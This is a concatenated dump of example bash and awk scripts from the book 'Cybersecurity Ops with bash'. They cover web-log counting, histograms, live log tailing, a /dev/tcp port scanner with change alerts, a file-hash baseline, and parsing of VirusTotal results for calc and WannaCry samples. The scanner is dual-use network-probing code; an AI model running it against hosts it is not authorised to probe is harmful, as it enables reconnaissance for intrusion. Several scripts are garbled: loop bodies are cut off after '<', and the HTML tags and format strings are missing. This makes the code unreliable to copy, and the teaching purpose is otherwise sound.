"GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19444 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:19:26:04 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1430 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.11 - - [12/Nov/2017:19:26:09 -0500] "GET /resources.html HTTP/1.1" 200 7569 "http://192.168.0.35/risk.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" 192.168.0.11 - - [12/Nov/2017:19:26:09 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" 192.168.0.11 - - [12/Nov/2017:19:26:09 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Work-Outside.html HTTP/1.1" 200 5011 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" ================================================ FILE: ch07/countem.awk ================================================ # Cybersecurity Ops with bash # countem.awk # # Description: # Count the number of instances of an item using awk # # Usage: # countem.awk < inputfile # awk '{ cnt[$1]++ } END { for (id in cnt) { printf "%d %s\n", cnt[id], id } }' ================================================ FILE: ch07/countem.sh ================================================ #!/bin/bash - # # Cybersecurity Ops with bash # countem.sh # # Description: # Count the number of instances of an item using bash # # Usage: # countem.sh < inputfile # declare -A cnt # assoc. array # <1> while read id xtra # <2> do let cnt[$id]++ # <3> done # now display what we counted # for each key in the (key, value) assoc. array for id in "${!cnt[@]}" # <4> do printf '%s %d\n' "$id" "${cnt[$id]}" # <5> done ================================================ FILE: ch07/histogram.sh ================================================ #!/bin/bash - # # Cybersecurity Ops with bash # histogram.sh # # Description: # Generate a horizontal bar chart of specified data # # Usage: ./histogram.sh # input format: label value # function pr_bar () # <1> { local -i i raw maxraw scaled # <2> raw=$1 maxraw=$2 ((scaled=(MAXBAR*raw)/maxraw)) # <3> # min size guarantee ((raw > 0 && scaled == 0)) && scaled=1 # <4> for((i=0; i declare -i MAXBAR max max=0 MAXBAR=50 # how large the largest bar should be while read labl val do let RA[$labl]=$val # <6> # keep the largest value; for scaling (( val > max )) && max=$val done # scale and print it for labl in "${!RA[@]}" # <7> do printf '%-20.20s ' "$labl" pr_bar ${RA[$labl]} $max # <8> done ================================================ FILE: ch07/histogram_plain.sh ================================================ #!/bin/bash - # # Cybersecurity Ops with bash # histogram_plain.sh # # Description: # Generate a horizontal bar chart of specified data without # using associative arrays, good for older versions of bash # # Usage: ./histogram_plain.sh # input format: label value # declare -a RA_key RA_val # <1> declare -i max ndx max=0 maxbar=50 # how large the largest bar should be ndx=0 while read labl val do RA_key[$ndx]=$labl # <2> RA_value[$ndx]=$val # keep the largest value; for scaling (( val > max )) && max=$val let ndx++ done # scale and print it for ((j=0; j do printf "%-20.20s " ${RA_key[$j]} pr_bar ${RA_value[$j]} $max done ================================================ FILE: ch07/pagereq.awk ================================================ # Cybersecurity Ops with bash # pagereq.awk # # Description: # Count the number of page requests for a given IP address using awk # # Usage: # pagereq < inputfile # IP address to search for # # count the number of page requests from an address ($1) awk -v page="$1" '{ if ($1==page) {cnt[$7]+=1 } } # <1> END { for (id in cnt) { # <2> printf "%8d %s\n", cnt[id], id } }' ================================================ FILE: ch07/pagereq.sh ================================================ # Cybersecurity Ops with bash # pagereq.sh # # Description: # Count the number of page requests for a given IP address using bash # # Usage: # pagereq < inputfile # IP address to search for # declare -A cnt # <1> while read addr d1 d2 datim gmtoff getr page therest do if [[ $1 == $addr ]] ; then let cnt[$page]+=1 ; fi done for id in ${!cnt[@]} # <2> do printf "%8d %s\n" ${cnt[$id]} $id done ================================================ FILE: ch07/summer.sh ================================================ #!/bin/bash - # # Cybersecurity Ops with bash # summer.sh # # Description: # Sum the total of field 2 values for each unique field 1 # # Usage: ./summer.sh # input format: # declare -A cnt # assoc. array while read id count do let cnt[$id]+=$count done for id in "${!cnt[@]}" do printf "%-15s %8d\n" "${id}" "${cnt[${id}]}" #<1> done ================================================ FILE: ch07/useragents.sh ================================================ #!/bin/bash - # # Cybersecurity Ops with bash # useragents.sh # # Description: # Read through a log looking for unknown user agents # # Usage: ./useragents.sh < # Apache access log # # mismatch - search through the array of known names # returns 1 (false) if it finds a match # returns 0 (true) if there is no match function mismatch () # <1> { local -i i # <2> for ((i=0; i<$KNSIZE; i++)) do [[ "$1" =~ .*${KNOWN[$i]}.* ]] && return 1 # <3> done return 0 } # read up the known ones readarray -t KNOWN < "useragents.txt" # <4> KNSIZE=${#KNOWN[@]} # <5> # preprocess logfile (stdin) to pick out ipaddr and user agent awk -F'"' '{print $1, $6}' | \ while read ipaddr dash1 dash2 dtstamp delta useragent # <6> do if mismatch "$useragent" then echo "anomaly: $ipaddr $useragent" fi done ================================================ FILE: ch07/useragents.txt ================================================ Firefox Chrome Safari Edge ================================================ FILE: ch08/livebar.sh ================================================ #!/bin/bash - # # Cybersecurity Ops with bash # livebar.sh # # Description: # Creates a rolling horizontal bar chart of live data # # Usage: # | bash livebar.sh # function pr_bar () # <1> { local raw maxraw scaled raw=$1 maxraw=$2 ((scaled=(maxbar*raw)/maxraw)) ((scaled == 0)) && scaled=1 # min size guarantee for((i=0; i MAX=60 while read dayst timst qty do if (( qty > MAX )) # <3> then let MAX=$qty+$qty/4 # allow some room echo " **** rescaling: MAX=$MAX" fi printf '%6.6s %6.6s %4d:' $dayst $timst $qty # <4> pr_bar $qty $MAX done ================================================ FILE: ch08/looper.sh ================================================ #!/bin/bash - # # Cybersecurity Ops with bash # looper.sh # # Description: # Count the lines in a file being tailed -f # Report the count interval on every SIGUSR1 # # Usage: ./looper.sh [filename] # filename of file to be tailed, default: log.file # function interval () # <1> { echo $(date '+%y%m%d %H%M%S') $cnt # <2> cnt=0 } declare -i cnt=0 trap interval SIGUSR1 # <3> shopt -s lastpipe # <4> tail -f --pid=$$ ${1:-log.file} | while read aline # <5> do let cnt++ done ================================================ FILE: ch08/tailcount.sh ================================================ #!/bin/bash - # # Cybersecurity Ops with bash # tailcount.sh # # Description: # Count lines every n seconds # # Usage: ./tailcount.sh [filename] # filename: passed to looper.sh # # cleanup - the other processes on exit function cleanup () { [[ -n $LOPID ]] && kill $LOPID # <1> } trap cleanup EXIT # <2> bash looper.sh $1 & # <3> LOPID=$! # <4> # give it a chance to start up sleep 3 while true do kill -SIGUSR1 $LOPID sleep 5 done >&2 # <5> ================================================ FILE: ch08/wintail.sh ================================================ #!/bin/bash - # # Cybersecurity Ops with bash # wintail.sh # # Description: # Perform a tail-like function on a Windows log # # Usage: ./wintail.sh # WINLOG="Application" #<1> LASTLOG=$(wevtutil qe "$WINLOG" //c:1 //rd:true //f:text) #<2> while true do CURRENTLOG=$(wevtutil qe "$WINLOG" //c:1 //rd:true //f:text) #<3> if [[ "$CURRENTLOG" != "$LASTLOG" ]] then echo "$CURRENTLOG" echo "----------------------------------" LASTLOG="$CURRENTLOG" fi done ================================================ FILE: ch09/autoscan.sh ================================================ #!/bin/bash - # # Cybersecurity Ops with bash # autoscan.sh # # Description: # Automatically performs a port scan (using scan.sh), # compares output to previous results, and emails user # Assumes that scan.sh is in the current directory. # # Usage: ./autoscan.sh # ./scan.sh < hostlist # <1> FILELIST=$(ls scan_* | tail -2) # <2> FILES=( $FILELIST ) TMPFILE=$(tempfile) # <3> ./fd2.sh ${FILES[0]} ${FILES[1]} > $TMPFILE if [[ -s $TMPFILE ]] # non-empty # <4> then echo "mailing today's port differences to $USER" mail -s "today's port differences" $USER < $TMPFILE # <5> fi # clean up rm -f $TMPFILE # <6> ================================================ FILE: ch09/fd2.sh ================================================ #!/bin/bash - # # Cybersecurity Ops with bash # fd2.sh # # Description: # Compares two port scans to find changes # MAJOR ASSUMPTION: both files have the same # of lines, # each line with the same host address # though with possibly different listed ports # # Usage: ./fd2.sh # # look for "$LOOKFOR" in the list of args to this function # returns true (0) if it is not in the list function NotInList () # <1> { for port in "$@" do if [[ $port == $LOOKFOR ]] then return 1 fi done return 0 } while true do read aline <&4 || break # at EOF # <2> read bline <&5 || break # at EOF, for symmetry # <3> # if [[ $aline == $bline ]] ; then continue; fi [[ $aline == $bline ]] && continue; # <4> # there's a difference, so we # subdivide into host and ports HOSTA=${aline%% *} # <5> PORTSA=( ${aline#* } ) # <6> HOSTB=${bline%% *} PORTSB=( ${bline#* } ) echo $HOSTA # identify the host which changed for porta in ${PORTSA[@]} do # <7> LOOKFOR=$porta NotInList ${PORTSB[@]} && echo " closed: $porta" done for portb in ${PORTSB[@]} do LOOKFOR=$portb NotInList ${PORTSA[@]} && echo " new: $portb" done done 4< ${1:-day1.data} 5< ${2:-day2.data} # <8> # day1.data and day2.data are default names to make it easier to test ================================================ FILE: ch09/scan.sh ================================================ #!/bin/bash - # # Cybersecurity Ops with bash # scan.sh # # Description: # Perform a port scan of a specified host # # Usage: ./scan.sh # File to save results in # function scan () { host=$1 printf '%s' "$host" # <1> for ((port=1;port<1024;port++)) do # order of redirects is important for 2 reasons echo >/dev/null 2>&1 < /dev/tcp/${host}/${port} # <2> if (($? == 0)) ; then printf ' %d' "${port}" ; fi # <3> done echo # or printf '\n' } # # main loop # read in each host name (from stdin) # and scan for open ports # save the results in a file # whose name is supplied as an argument # or default to one based on today's date # printf -v TODAY 'scan_%(%F)T' -1 # e.g., scan_2017-11-27 # <4> OUTFILE=${1:-$TODAY} # <5> while read HOSTNAME do scan $HOSTNAME done > $OUTFILE # <6> ================================================ FILE: ch10/baseline.sh ================================================ #!/bin/bash # baseline.sh - compare baselines # and report on differences # function usageErr () { echo 'usage: baseline.sh [-d path] file1 [file2]' echo 'creates or compares a baseline from path' echo 'default for path is /' exit 2 } >&2 # <1> function dosumming () { find "${DIR[@]}" -type f | xargs -d '\n' sha1sum # <2> } # =============================== # MAIN # =============================== declare -a DIR # ---------- parse the arguments while getopts "d:" MYOPT # <3> do # no check for MYOPT since there is only one choice DIR+=( "$OPTARG" ) # <4> done shift $((OPTIND-1)) # <5> # no arguments? too many? (( $# == 0 || $# > 2 )) && usageErr (( ${#DIR[*]} == 0 )) && DIR=( "/" ) # <6> # create either a baseline (only 1 filename provided) # or a secondary summary (when two filenames are provided) BASE="$1" B2ND="$2" if (( $# == 1 )) # only 1 arg. then # creating "$BASE" dosumming > "$BASE" # all done for baseline exit fi if [[ ! -r "$BASE" ]] then usageErr fi # --------- on to the actual work: # if 2nd file exists just compare the two # else create/fill it if [[ ! -e "$B2ND" ]] then echo creating "$B2ND" dosumming > "$B2ND" fi # now we have: 2 files created by sha1sum declare -A BYPATH BYHASH INUSE # assoc. arrays # load up the first file as the baseline while read HNUM FN do BYPATH["$FN"]=$HNUM BYHASH[$HNUM]="$FN" INUSE["$FN"]="X" done < "$BASE" # ------ now begin the output # see if each filename listed in the 2nd file is in # the same place (path) as in the 1st (the baseline) printf '\n' "$HOSTNAME" "${DIR[*]}" while read HNUM FN # <7> do WASHASH="${BYPATH[${FN}]}" # did it find one? if not, it will be null if [[ -z $WASHASH ]] then ALTFN="${BYHASH[$HNUM]}" if [[ -z $ALTFN ]] then printf ' %s\n' "$FN" else printf ' %s\n' "$ALTFN" "$FN" INUSE["$ALTFN"]='_' # mark this as seen fi else INUSE["$FN"]='_' # mark this as seen if [[ $HNUM == $WASHASH ]] then continue; # nothing changed; else printf ' %s\n' "$FN" fi fi done < "$B2ND" # <8> for FN in "${!INUSE[@]}" do if [[ "${INUSE[$FN]}" == 'X' ]] then printf ' %s\n' "$FN" fi done printf '\n' ================================================ FILE: ch11/Calc_VT.txt ================================================ {"scans": {"Bkav": {"detected": false, "version": "1.3.0.9466", "result": null, "update": "20180712"}, "MicroWorld-eScan": {"detected": false, "version": "14.0.297.0", "result": null, "update": "20180712"}, "VBA32": {"detected": false, "version": "3.12.32.0", "result": null, "update": "20180712"}, "CMC": {"detected": false, "version": "1.1.0.977", "result": null, "update": "20180712"}, "CAT-QuickHeal": {"detected": false, "version": "14.00", "result": null, "update": "20180712"}, "McAfee": {"detected": false, "version": "6.0.6.653", "result": null, "update": "20180712"}, "Cylance": {"detected": true, "version": "2.3.1.101", "result": "Unsafe", "update": "20180712"}, "AegisLab": {"detected": false, "version": "4.2", "result": null, "update": "20180712"}, "CrowdStrike": {"detected": false, "version": "1.0", "result": null, "update": "20180530"}, "K7GW": {"detected": false, "version": "10.53.27735", "result": null, "update": "20180712"}, "K7AntiVirus": {"detected": false, "version": "10.53.27740", "result": null, "update": "20180712"}, "TheHacker": {"detected": false, "version": "6.8.0.5.3314", "result": null, "update": "20180712"}, "TrendMicro": {"detected": false, "version": "10.0.0.1040", "result": null, "update": "20180712"}, "Baidu": {"detected": false, "version": "1.0.0.2", "result": null, "update": "20180712"}, "NANO-Antivirus": {"detected": false, "version": "1.0.116.23366", "result": null, "update": "20180712"}, "F-Prot": {"detected": false, "version": "4.7.1.166", "result": null, "update": "20180712"}, "Symantec": {"detected": false, "version": "1.6.0.0", "result": null, "update": "20180712"}, "ESET-NOD32": {"detected": false, "version": "17703", "result": null, "update": "20180712"}, "TrendMicro-HouseCall": {"detected": false, "version": "9.950.0.1006", "result": null, "update": "20180712"}, "Paloalto": {"detected": false, "version": "1.0", "result": null, "update": "20180712"}, "ClamAV": {"detected": false, "version": "0.100.1.0", "result": null, "update": "20180712"}, "Kaspersky": {"detected": false, "version": "15.0.1.13", "result": null, "update": "20180712"}, "BitDefender": {"detected": false, "version": "7.2", "result": null, "update": "20180712"}, "Babable": {"detected": false, "version": "9107201", "result": null, "update": "20180406"}, "ViRobot": {"detected": false, "version": "2014.3.20.0", "result": null, "update": "20180712"}, "Avast": {"detected": false, "version": "18.4.3895.0", "result": null, "update": "20180712"}, "Tencent": {"detected": false, "version": "1.0.0.1", "result": null, "update": "20180712"}, "Endgame": {"detected": false, "version": "3.0.0", "result": null, "update": "20180711"}, "Sophos": {"detected": false, "version": "4.98.0", "result": null, "update": "20180712"}, "Comodo": {"detected": false, "version": "29334", "result": null, "update": "20180712"}, "F-Secure": {"detected": false, "version": "11.0.19100.45", "result": null, "update": "20180712"}, "DrWeb": {"detected": false, "version": "7.0.33.6080", "result": null, "update": "20180712"}, "VIPRE": {"detected": false, "version": "68060", "result": null, "update": "20180712"}, "Invincea": {"detected": false, "version": "6.3.5.26121", "result": null, "update": "20180601"}, "McAfee-GW-Edition": {"detected": false, "version": "v2017.3010", "result": null, "update": "20180712"}, "Emsisoft": {"detected": false, "version": "2018.4.0.1029", "result": null, "update": "20180712"}, "SentinelOne": {"detected": false, "version": "1.0.17.227", "result": null, "update": "20180701"}, "Cyren": {"detected": false, "version": "6.0.0.4", "result": null, "update": "20180712"}, "Jiangmin": {"detected": false, "version": "16.0.100", "result": null, "update": "20180712"}, "Webroot": {"detected": false, "version": "1.0.0.403", "result": null, "update": "20180712"}, "Avira": {"detected": false, "version": "8.3.3.6", "result": null, "update": "20180710"}, "MAX": {"detected": false, "version": "2017.11.15.1", "result": null, "update": "20180712"}, "Antiy-AVL": {"detected": false, "version": "3.0.0.1", "result": null, "update": "20180712"}, "Kingsoft": {"detected": false, "version": "2013.8.14.323", "result": null, "update": "20180712"}, "Microsoft": {"detected": false, "version": "1.1.15000.2", "result": null, "update": "20180712"}, "Arcabit": {"detected": false, "version": "1.0.0.831", "result": null, "update": "20180712"}, "SUPERAntiSpyware": {"detected": false, "version": "5.6.0.1032", "result": null, "update": "20180712"}, "ZoneAlarm": {"detected": false, "version": "1.0", "result": null, "update": "20180712"}, "Avast-Mobile": {"detected": false, "version": "180711-22", "result": null, "update": "20180712"}, "GData": {"detected": false, "version": "A:25.17758B:25.12706", "result": null, "update": "20180712"}, "AhnLab-V3": {"detected": false, "version": "3.13.1.21452", "result": null, "update": "20180712"}, "ALYac": {"detected": false, "version": "1.1.1.5", "result": null, "update": "20180712"}, "AVware": {"detected": false, "version": "1.6.0.52", "result": null, "update": "20180712"}, "TACHYON": {"detected": false, "version": "2018-07-12.02", "result": null, "update": "20180712"}, "Ad-Aware": {"detected": false, "version": "3.0.5.370", "result": null, "update": "20180712"}, "Malwarebytes": {"detected": false, "version": "2.1.1.1115", "result": null, "update": "20180712"}, "Zoner": {"detected": false, "version": "1.0", "result": null, "update": "20180711"}, "Rising": {"detected": false, "version": "25.0.0.20", "result": null, "update": "20180712"}, "Yandex": {"detected": false, "version": "5.5.1.3", "result": null, "update": "20180712"}, "Ikarus": {"detected": false, "version": "0.1.5.2", "result": null, "update": "20180712"}, "eGambit": {"detected": false, "version": null, "result": null, "update": "20180712"}, "Fortinet": {"detected": false, "version": "5.4.247.0", "result": null, "update": "20180712"}, "AVG": {"detected": false, "version": "18.4.3895.0", "result": null, "update": "20180712"}, "Cybereason": {"detected": false, "version": "1.2.27", "result": null, "update": "20180225"}, "Panda": {"detected": false, "version": "4.6.4.2", "result": null, "update": "20180712"}, "Qihoo-360": {"detected": false, "version": "1.0.0.1120", "result": null, "update": "20180712"}}, "scan_id": "284674a806bcbe692c76761baaf21327638de0c7135bfb06953648be7d661fbd-1531411370", "sha1": "1a4e2c3bbc095cb7d9b85cabe2aea2c9a769b480", "resource": "284674a806bcbe692c76761baaf21327638de0c7135bfb06953648be7d661fbd", "response_code": 1, "scan_date": "2018-07-12 16:02:50", "permalink": "https://www.virustotal.com/file/284674a806bcbe692c76761baaf21327638de0c7135bfb06953648be7d661fbd/analysis/1531411370/", "verbose_msg": "Scan finished, information embedded", "total": 66, "positives": 1, "sha256": "284674a806bcbe692c76761baaf21327638de0c7135bfb06953648be7d661fbd", "md5": "afaf2cdf9981342c494b28630608f74a"} ================================================ FILE: ch11/WannaCry_VT.txt ================================================ {"scans": {"Bkav": {"detected": true, "version": "1.3.0.9466", "result": "W32.WannaCrypLTE.Trojan", "update": "20180712"}, "MicroWorld-eScan": {"detected": true, "version": "14.0.297.0", "result": "Trojan.Ransom.WannaCryptor.H", "update": "20180712"}, "CMC": {"detected": false, "version": "1.1.0.977", "result": null, "update": "20180712"}, "CAT-QuickHeal": {"detected": true, "version": "14.00", "result": "Trojan.Mauvaise.SL1", "update": "20180712"}, "McAfee": {"detected": true, "version": "6.0.6.653", "result": "Ransom-O", "update": "20180712"}, "Cylance": {"detected": true, "version": "2.3.1.101", "result": "Unsafe", "update": "20180712"}, "Zillya": {"detected": true, "version": "2.0.0.3593", "result": "Trojan.WannaCryptGen.Win32.2", "update": "20180712"}, "SUPERAntiSpyware": {"detected": true, "version": "5.6.0.1032", "result": "Ransom.WannaCrypt/Variant", "update": "20180712"}, "TheHacker": {"detected": true, "version": "6.8.0.5.3314", "result": "Trojan/Exploit.CVE-2017-0147.a", "update": "20180712"}, "K7GW": {"detected": true, "version": "10.53.27735", "result": "Exploit ( 0050d7a31 )", "update": "20180712"}, "K7AntiVirus": {"detected": true, "version": "10.53.27740", "result": "Exploit ( 0050d7a31 )", "update": "20180712"}, "Arcabit": {"detected": false, "version": "1.0.0.831", "result": null, "update": "20180712"}, "TrendMicro": {"detected": true, "version": "10.0.0.1040", "result": "WORM_WCRY.A", "update": "20180712"}, "Baidu": {"detected": true, "version": "1.0.0.2", "result": "Win32.Worm.Rbot.a", "update": "20180712"}, "NANO-Antivirus": {"detected": true, "version": "1.0.116.23366", "result": "Trojan.Win32.Wanna.eoqegc", "update": "20180712"}, "Cyren": {"detected": true, "version": "6.0.0.4", "result": "W32/Trojan.ZTSA-8671", "update": "20180712"}, "Symantec": {"detected": true, "version": "1.6.0.0", "result": "Ransom.Wannacry", "update": "20180712"}, "TotalDefense": {"detected": false, "version": "37.1.62.1", "result": null, "update": "20180712"}, "TrendMicro-HouseCall": {"detected": true, "version": "9.950.0.1006", "result": "WORM_WCRY.A", "update": "20180712"}, "Avast": {"detected": true, "version": "18.4.3895.0", "result": "Win32:WanaCry-A [Trj]", "update": "20180712"}, "ClamAV": {"detected": true, "version": "0.100.1.0", "result": "Win.Ransomware.WannaCry-6313787-0", "update": "20180712"}, "Kaspersky": {"detected": true, "version": "15.0.1.13", "result": "Trojan-Ransom.Win32.Wanna.m", "update": "20180712"}, "BitDefender": {"detected": true, "version": "7.2", "result": "Trojan.Ransom.WannaCryptor.H", "update": "20180712"}, "Babable": {"detected": false, "version": "9107201", "result": null, "update": "20180406"}, "Paloalto": {"detected": true, "version": "1.0", "result": "generic.ml", "update": "20180712"}, "AegisLab": {"detected": true, "version": "4.2", "result": "Troj.Ransom.W32!c", "update": "20180712"}, "Rising": {"detected": true, "version": "25.0.0.20", "result": "Exploit.EternalBlue!1.AAED (CLASSIC)", "update": "20180712"}, "Ad-Aware": {"detected": true, "version": "3.0.5.370", "result": "Trojan.Ransom.WannaCryptor.H", "update": "20180712"}, "Emsisoft": {"detected": true, "version": "2018.4.0.1029", "result": "Trojan-Ransom.WanaCrypt0r (A)", "update": "20180712"}, "Comodo": {"detected": true, "version": "29335", "result": "TrojWare.Win32.WannaCry.jet", "update": "20180712"}, "F-Secure": {"detected": true, "version": "11.0.19100.45", "result": "Trojan.Ransom.WannaCryptor.H", "update": "20180712"}, "DrWeb": {"detected": true, "version": "7.0.33.6080", "result": "Trojan.Encoder.11432", "update": "20180712"}, "VIPRE": {"detected": true, "version": "68066", "result": "Trojan.Win32.Generic!BT", "update": "20180712"}, "Invincea": {"detected": true, "version": "6.3.5.26121", "result": "heuristic", "update": "20180601"}, "McAfee-GW-Edition": {"detected": true, "version": "v2017.3010", "result": "BehavesLike.Win32.RansomWannaCry.wc", "update": "20180712"}, "Sophos": {"detected": true, "version": "4.98.0", "result": "Troj/Ransom-EMG", "update": "20180712"}, "SentinelOne": {"detected": true, "version": "1.0.17.227", "result": "static engine - malicious", "update": "20180701"}, "F-Prot": {"detected": true, "version": "4.7.1.166", "result": "W32/WannaCrypt.D", "update": "20180712"}, "Jiangmin": {"detected": true, "version": "16.0.100", "result": "Trojan.WanaCry.i", "update": "20180712"}, "Webroot": {"detected": true, "version": "1.0.0.403", "result": "W32.Ransom.Wannacry", "update": "20180712"}, "Avira": {"detected": true, "version": "8.3.3.6", "result": "TR/Ransom.IZ", "update": "20180712"}, "Fortinet": {"detected": true, "version": "5.4.247.0", "result": "W32/WannaCryptor.H!tr.ransom", "update": "20180712"}, "Antiy-AVL": {"detected": true, "version": "3.0.0.1", "result": "Trojan[Ransom]/Win32.Scatter", "update": "20180712"}, "Kingsoft": {"detected": false, "version": "2013.8.14.323", "result": null, "update": "20180712"}, "Endgame": {"detected": true, "version": "3.0.0", "result": "malicious (high confidence)", "update": "20180711"}, "Microsoft": {"detected": true, "version": "1.1.15000.2", "result": "Ransom:Win32/WannaCrypt", "update": "20180712"}, "ViRobot": {"detected": true, "version": "2014.3.20.0", "result": "Trojan.Win32.S.WannaCry.3723264.S", "update": "20180712"}, "ZoneAlarm": {"detected": true, "version": "1.0", "result": "Trojan-Ransom.Win32.Wanna.m", "update": "20180712"}, "Avast-Mobile": {"detected": false, "version": "180711-22", "result": null, "update": "20180712"}, "TACHYON": {"detected": true, "version": "2018-07-12.02", "result": "Ransom/W32.WannaCry.Zen", "update": "20180712"}, "AhnLab-V3": {"detected": true, "version": "3.13.1.21452", "result": "Trojan/Win32.WannaCryptor.R200572", "update": "20180712"}, "ALYac": {"detected": true, "version": "1.1.1.5", "result": "Trojan.Ransom.WannaCryptor", "update": "20180712"}, "AVware": {"detected": true, "version": "1.6.0.52", "result": "Trojan.Win32.Generic!BT", "update": "20180712"}, "MAX": {"detected": true, "version": "2017.11.15.1", "result": "malware (ai score=100)", "update": "20180712"}, "VBA32": {"detected": true, "version": "3.12.32.0", "result": "TrojanRansom.Wanna", "update": "20180712"}, "Malwarebytes": {"detected": true, "version": "2.1.1.1115", "result": "Ransom.WannaCrypt", "update": "20180712"}, "Zoner": {"detected": true, "version": "1.0", "result": "Trojan.Wannacry", "update": "20180711"}, "ESET-NOD32": {"detected": true, "version": "17703", "result": "Win32/Exploit.CVE-2017-0147.A", "update": "20180712"}, "Tencent": {"detected": true, "version": "1.0.0.1", "result": "Trojan.Win32.WannaCry.b", "update": "20180712"}, "Yandex": {"detected": true, "version": "5.5.1.3", "result": "Exploit.CVE-2017-0147!", "update": "20180712"}, "Ikarus": {"detected": true, "version": "0.1.5.2", "result": "Trojan-Ransom.WannaCry", "update": "20180712"}, "eGambit": {"detected": false, "version": null, "result": null, "update": "20180712"}, "GData": {"detected": true, "version": "A:25.17758B:25.12706", "result": "Win32.Trojan-Ransom.WannaCry.D", "update": "20180712"}, "AVG": {"detected": true, "version": "18.4.3895.0", "result": "Win32:WanaCry-A [Trj]", "update": "20180712"}, "Cybereason": {"detected": true, "version": "1.2.27", "result": "malicious.7c37d2", "update": "20180225"}, "Panda": {"detected": true, "version": "4.6.4.2", "result": "Trj/RansomCrypt.K", "update": "20180712"}, "CrowdStrike": {"detected": true, "version": "1.0", "result": "malicious_confidence_100% (W)", "update": "20180530"}, "Qihoo-360": {"detected": true, "version": "1.0.0.1120", "result": "Win32/Trojan.Multi.daf", "update": "20180712"}}, "scan_id": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c-1531416969", "sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", "resource": "db349b97c37d22f5ea1d1841e3c89eb4", "response_code": 1, "scan_date": "2018-07-12 17:36:09", "permalink": "https://www.virustotal.com/file/24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c/analysis/1531416969/", "verbose_msg": "Scan finished, information embedded", "total": 68, "positives": 61, "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", "md5": "db349b97c37d22f5ea1d1841e3c89eb4"} ================================================ FILE: ch11/helloworld.c ================================================ #include int main() { printf("Hello World!\n"); return 0; } ================================================ FILE: ch11/vtjson.awk ================================================ # Cybersecurity Ops with bash # vtjson.awk # # Description: # Search a JSON file for VirusTotal malware hits # # Usage: # vtjson.awk # File containing results from VirusTotal # FN="${1:-Calc_VirusTotal.txt}" sed -e 's/{"scans": {/&\n /' -e 's/},/&\n/g' "$FN" | # <1> awk ' NF == 9 { # <2> COMMA="," QUOTE="\"" # <3> if ( $3 == "true" COMMA ) { # <4> VIRUS=$1 # <5> gsub(QUOTE, "", VIRUS) # <6> RESLT=$7 gsub(QUOTE, "", RESLT) gsub(COMMA, "", RESLT) print VIRUS, "- result:", RESLT } }' ================================================ FILE: ch11/vtjson.sh ================================================ #!/bin/bash - # # Rapid Cybersecurity Ops # vtjson.sh # # Description: # Search a JSON file for VirusTotal malware hits # # Usage: # vtjson.awk [] # File containing results from VirusTotal # default: Calc_VirusTotal.txt # RE='^.(.*)...\{.*detect..(.*),..vers.*result....(.*).,..update.*$' # <1> FN="${1:-Calc_VirusTotal.txt}" sed -e 's/{"scans": {/&\n /' -e 's/},/&\n/g' "$FN" | # <2> while read ALINE do if [[ $ALINE =~ $RE ]] # <3> then VIRUS="${BASH_REMATCH[1]}" # <4> FOUND="${BASH_REMATCH[2]}" RESLT="${BASH_REMATCH[3]}" if [[ $FOUND =~ .*true.* ]] # <5> then echo $VIRUS "- result:" $RESLT fi fi done ================================================ FILE: ch12/tagit.sh ================================================ #!/bin/bash - # # Cybersecurity Ops with bash # tagit.sh # # Description: # Place open and close tags around a string # # Usage: # tagit.sh # Tag to use # String to tag # printf '<%s>%s\n' "${1}" "${2}" "${1}" ================================================ FILE: ch12/webdash.sh ================================================ #!/bin/bash - # # Rapid Cybersecurity Ops # webdash.sh # # Description: # Create an information dashboard # Heading # -------------- # 1-line of output # -------------- # 5 lines of output # ... # -------------- # column labels and then # 8 lines of histograms # ... # -------------- # # some important constant strings UPTOP=$(tput cup 0 0) # <1> ERAS2EOL=$(tput el) REV=$(tput rev) # reverse video OFF=$(tput sgr0) # general reset SMUL=$(tput smul) # underline mode on (start) RMUL=$(tput rmul) # underline mode off (reset) COLUMNS=$(tput cols) # how wide is our window # DASHES='------------------------------------' printf -v DASHES '%*s' $COLUMNS '-' # <2> DASHES=${DASHES// /-} # # prSection - print a section of the screen # print $1-many lines from stdin # each line is a full line of text # followed by erase-to-end-of-line # sections end with a line of dashes # function prSection () { local -i i # <3> for((i=0; i < ${1:-5}; i++)) do read aline printf '%s%s\n' "$aline" "${ERAS2EOL}" # <4> done printf '%s%s\n%s' "$DASHES" "${ERAS2EOL}" "${ERAS2EOL}" } function cleanup() # <5> { if [[ -n $BGPID ]] then kill %1 # <6> rm -f $TMPFILE fi } &> /dev/null # <7> trap cleanup EXIT # launch the bg process TMPFILE=$(tempfile) # <8> { bash tailcount.sh $1 | \ bash livebar.sh > $TMPFILE ; } & # <9> BGPID=$! clear while true do printf '%s' "$UPTOP" # heading: echo "${REV}Rapid Cyber Ops Ch. 12 -- Security Dashboard${OFF}" \ | prSection 1 #---------------------------------------- { # <10> printf 'connections:%4d %s\n' \ $(netstat -an | grep 'ESTAB' | wc -l) "$(date)" } | prSection 1 #---------------------------------------- tail -5 /var/log/syslog | cut -c 1-16,45-105 | prSection 5 #---------------------------------------- { echo "${SMUL}yymmdd${RMUL}" \ "${SMUL}hhmmss${RMUL}" \ "${SMUL}count of events${RMUL}" tail -8 $TMPFILE } | prSection 9 sleep 3 done ================================================ FILE: ch12/weblogfmt.sh ================================================ #!/bin/bash - # # Cybersecurity Ops with bash # weblogfmt.sh # # Description: # Read in Apache web log and output as HTML # # Usage: # weblogfmt.sh input.file > output.file # function tagit() { printf '<%s>%s\n' "${1}" "${2}" "${1}" } #basic 